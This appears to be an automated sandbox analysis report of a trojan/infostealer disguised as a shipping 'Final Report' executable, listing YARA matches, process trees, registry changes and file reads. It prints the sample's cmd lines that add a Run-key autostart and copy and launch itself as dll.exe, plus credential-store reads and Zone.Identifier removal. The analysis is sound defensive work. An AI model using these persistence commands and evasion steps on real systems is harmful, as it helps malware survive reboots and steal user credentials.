Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 15.2.InstallUtil.exe.7b0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, x5M7.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, Py.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, OTWUo99bfyR.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, OTWUo99bfyR.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, Ui9qhZiA7.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, Ui9qhZiA7.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, BqMB7yHhrXg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, BqMB7yHhrXg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, BqMB7yHhrXg.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, BqMB7yHhrXg.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/11@2/3

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	ReversingLabs: Detection: 60%
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Virustotal: Detection: 63%

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	String found in binary or memory: Round!nombrebusesusees!debitBuses_infos-AdddebitBuses_infosRow
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	String found in binary or memory: organismePresId#synthese833Detail/Addsynthese833DetailRow
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	String found in binary or memory: Ecart3!Synth12123trtSem-AddSynth12123trtSemRow%PeseeMoyenneMesure!EcartMoyenMesure%PreseeMoyennePompe!EcartMoyenPompte

Source: unknown	Process created: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe"
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 37
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 39 > nul && copy "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" && ping 127.0.0.1 -n 39 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 39 > nul && copy "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" && ping 127.0.0.1 -n 39 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 37	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 39	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: newfile.exe, 00000012.00000000.3690297545.0000000000362000.00000002.00000001.01000000.0000000C.sdmp, newfile.exe.16.dr
Source:	Binary string: InstallUtil.pdb source: newfile.exe, 00000012.00000000.3690297545.0000000000362000.00000002.00000001.01000000.0000000C.sdmp, newfile.exe.16.dr

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 14.2.dll.exe.3ff1102.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.388edf0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.50c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.388edf0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.50c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3568807416.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.000000000388E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2046079068.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3568807416.00000000040E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3568807416.000000000402C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044074140.0000000002774000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3558267048.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3558267048.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044074140.0000000002681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dll.exe PID: 6048, type: MEMORYSTR

.NET source code contains potential unpacker

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, p8YJ.cs	.Net Code: Gw6d System.Reflection.Assembly.Load(byte[])
Source: dll.exe.8.dr, p8YJ.cs	.Net Code: Gw6d System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_04C22C18 pushad ; ret	0_2_04C22C19
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_059D61B8 push esp; retf	0_2_059D61B9
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_05C7AD80 push esp; ret	0_2_05C7D1FD
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_05C7D1D8 push esp; ret	0_2_05C7D1FD
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_05C7A1B3 push esp; ret	0_2_05C7A22D
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_0734EC20 pushad ; ret	0_2_0734F183
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_0734F11D pushad ; ret	0_2_0734F183
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_073495A6 pushad ; ret	0_2_073495E3
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07340DC6 push FFFFFFE9h; retn 0001h	0_2_07340DC8
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07349610 push ecx; ret	0_2_07349622
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07340EC5 push FFFFFFE9h; ret	0_2_07340EC7
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07379230 push es; ret	0_2_0737926A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_02E170F0 push esp; retf	14_2_02E170FD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_054E2C1A push eax; ret	14_2_054E2C21
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_054E2C18 pushad ; ret	14_2_054E2C19
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0620AD80 push esp; ret	14_2_0620D1FD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0620A1B0 push esp; ret	14_2_0620A22D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0620D1D8 push esp; ret	14_2_0620D1FD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_0620AC40 push esp; ret	14_2_0620AC93
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07910EC5 push FFFFFFE9h; ret	14_2_07910EC7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07910DC6 push FFFFFFE9h; retn 0001h	14_2_07910DC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07989FE8 pushad ; iretd	14_2_07989FF5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07D60A87 push FFFFFF8Bh; iretd	14_2_07D60A8B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Code function: 14_2_07D6D9C2 push eax; ret	14_2_07D6D9C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 16_2_06625AB0 push es; ret	16_2_06625AC0

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	File created: \sg foundation sg24004-01cz24001-01 daily cargo hold bilge pump out log ==final report==.exe
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	File created: \sg foundation sg24004-01cz24001-01 daily cargo hold bilge pump out log ==final report==.exe
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	File created: \sg foundation sg24004-01cz24001-01 daily cargo hold bilge pump out log ==final report==.exe	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	File created: \sg foundation sg24004-01cz24001-01 daily cargo hold bilge pump out log ==final report==.exe	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run program			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run program	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run program	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	File opened: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
